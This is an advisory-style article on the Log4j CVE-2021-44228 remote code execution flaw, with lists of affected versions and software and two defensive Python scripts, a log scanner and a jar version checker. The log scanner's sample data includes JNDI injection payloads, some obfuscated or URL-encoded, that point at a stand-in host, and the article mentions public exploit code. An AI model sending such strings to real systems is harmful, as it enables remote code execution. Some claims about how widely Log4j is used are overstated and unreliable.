On December 9, 2021, a remote code execution (RCE) vulnerability in Apache Log4j 2 was identified and assigned the identifier CVE-2021-44228. A public proof of concept (PoC) has been released and shows that exploitation is extremely easy. By sending a malicious request to a system vulnerable to Log4j, an attacker can make that system download and then execute malicious code. Because the exploit was discovered only recently, many servers, whether physical or in cloud environments, have yet to be patched. As with many high-severity RCE exploits, large-scale scanning of the internet has already begun with the aim of finding and exploiting unpatched systems. To fix the Log4j vulnerability, you need to upgrade all systems to the latest version of Apache Log4j 2 (2.15.0-rc2).
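The scanning described above leaves traces in web server access logs, because the malicious request has to carry a `${jndi:...}` lookup string in some header or parameter that the application ends up logging. The following Python script is an added example (not code from the original article) that searches access-log lines for such lookup strings; it URL-decodes each line and collapses the nested `${lower:...}`/`${upper:...}` and `${x:-y}` lookups that a vulnerable Log4j 2 would resolve before matching. The log lines, IP addresses and the `scanner.example` host are constructed sample data, not real indicators.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (hypothetical hosts and IPs); not from the original article.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://scanner.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:03:15:01 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fscanner.example%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.8 - - [10/Dec/2021:03:15:30 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://scanner.example/c}"',
]

# Innermost nested lookups: ${lower:X}, ${upper:X}, and the default-value form ${...:-X}.
_NESTED = re.compile(r"\$\{(lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}")

# The lookup prefix that triggers the JNDI resolution in vulnerable Log4j 2 versions.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(m: re.Match) -> str:
    """Replace one innermost nested lookup with the value Log4j would substitute."""
    if m.group(1):
        value = m.group(2)
        return value.lower() if m.group(1) == "lower" else value.upper()
    return m.group(3)


def normalize(line: str) -> str:
    """URL-decode twice (handles double encoding) and collapse nested lookups until stable."""
    text = unquote(unquote(line))
    while True:
        collapsed = _NESTED.sub(_resolve, text)
        if collapsed == text:
            return text
        text = collapsed


def is_jndi_probe(line: str) -> bool:
    """True if the line, after normalization, contains a JNDI lookup string."""
    return _JNDI.search(normalize(line)) is not None


def find_jndi_probes(lines):
    """Return (index, normalized_line) for every log line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        if is_jndi_probe(line):
            hits.append((i, normalize(line)))
    return hits


if __name__ == "__main__":
    for idx, normalized in find_jndi_probes(SAMPLE_LOG_LINES):
        print(f"line {idx}: {normalized}")
```

Running the script over a real access log (`find_jndi_probes(open(path))`) flags lines for triage; a match means a probe reached the server, not that it succeeded, so the next check is the application's own logs and outbound LDAP/RMI connections from the host.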
Log4j is a Java library and, although the language is less popular with consumers these days, it is still very widely used in enterprise systems and web applications.
Currently, almost all Java applications use the Log4j library. Log4j is developed by the Apache Foundation and is widely used by both enterprise applications and cloud services.
Web applications and products from Apple, Amazon, Cloudflare, Twitter, and Steam are all vulnerable to RCE attacks that target this vulnerability.
Affected Apache Log4j versions
Apache Log4j 2.x <= 2.15.0-rc1
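To check a host against the range stated above, it helps to have a version comparison that understands release-candidate suffixes, since `2.15.0-rc1` is inside the range while `2.15.0-rc2` is not. The following Python script is an added example (not from the original article): it parses Log4j version strings into comparable tuples, decides whether a version falls within `2.x <= 2.15.0-rc1`, and inspects `log4j-core-*.jar` filenames (the vulnerable lookup code lives in log4j-core, not log4j-api). The file paths in `SAMPLE_PATHS` are constructed examples.

```python
import os
import re
from typing import Iterable, List, Tuple

# Upper bound of the affected range as stated in the article: 2.x <= 2.15.0-rc1.
AFFECTED_MAX = "2.15.0-rc1"

_STAGE_ORDER = {"alpha": 0, "beta": 1, "rc": 2}
_FINAL_STAGE = 3  # a final release sorts after any of its pre-releases

_VERSION_RE = re.compile(r"^(\d+(?:\.\d+)*)(?:-(alpha|beta|rc)(\d*))?$", re.IGNORECASE)
_JAR_RE = re.compile(r"^log4j-core-(.+)\.jar$", re.IGNORECASE)

# Constructed sample paths (hypothetical deployments); not from the original article.
SAMPLE_PATHS = [
    "/opt/app/lib/log4j-core-2.14.1.jar",
    "/opt/app/lib/log4j-api-2.14.1.jar",
    "/srv/search/lib/log4j-core-2.15.0-rc1.jar",
    "/srv/search/lib/log4j-core-2.15.0-rc2.jar",
    "/legacy/lib/log4j-1.2.17.jar",
]


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '2.15.0-rc1' into (2, 15, 0, stage, stage_number) so tuples compare correctly."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version string: {version!r}")
    nums = [int(x) for x in m.group(1).split(".")]
    nums += [0] * (3 - len(nums))  # pad '2.15' to '2.15.0'
    if m.group(2):
        stage = _STAGE_ORDER[m.group(2).lower()]
        stage_num = int(m.group(3) or 0)
    else:
        stage, stage_num = _FINAL_STAGE, 0
    return tuple(nums[:3]) + (stage, stage_num)


def is_affected(version: str) -> bool:
    """True if the version is a 2.x release at or below the stated upper bound."""
    v = parse_version(version)
    return v[0] == 2 and v <= parse_version(AFFECTED_MAX)


def find_affected_jars(paths: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (path, version) for every log4j-core jar whose version is in the affected range."""
    hits = []
    for path in paths:
        m = _JAR_RE.match(os.path.basename(path))
        if not m:
            continue  # not log4j-core (log4j-api, log4j 1.x, unrelated jars)
        version = m.group(1)
        try:
            if is_affected(version):
                hits.append((path, version))
        except ValueError:
            hits.append((path, version))  # unparsable version: report for manual review
    return hits


def walk_jars(root: str) -> Iterable[str]:
    """Yield every .jar path under root, for use with find_affected_jars on a real host."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".jar"):
                yield os.path.join(dirpath, name)


if __name__ == "__main__":
    for path, version in find_affected_jars(SAMPLE_PATHS):
        print(f"AFFECTED {version}: {path}")
```

On a real host, replace `SAMPLE_PATHS` with `walk_jars("/")` (or the application's install root). Filename matching is only a first pass: shaded or fat jars that bundle log4j-core under another name will not be caught, so a negative result from this script is not proof that the host is clean.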
Affected software
Apache Log4j 2 is an open source Java-based logging module used in many Java applications around the world. Compared to the initial log4j 1.x release, Log4j 2 resolved the issues with the previous release and provided a plugin architecture for users. On August 5, 2015, Log4j 2 became the major release, and all users of previous log4j versions were recommended to upgrade to Log4j 2. Apache Log4j 2 is widely used in many popular software applications, such as Apache Struts, ElasticSearch, Redis, Kafka and others.
A significant number of Java-based applications use log4j as their logging utility and are highly exposed to attacks exploiting this CVE. At a minimum, the following software may be affected:
- Apache Struts
- Apache Solr
- Apache Druid
- Apache Flink
- ElasticSearch
- Flume
- Apache Dubbo
- Logstash
- Kafka
- Spring-Boot-starter-log4j2
List of companies whose products are affected
Currently, there are some GitHub pages sharing PoCs for exploiting the Log4j vulnerability (CVE-2021-44228); if you want to research further, you can find them there.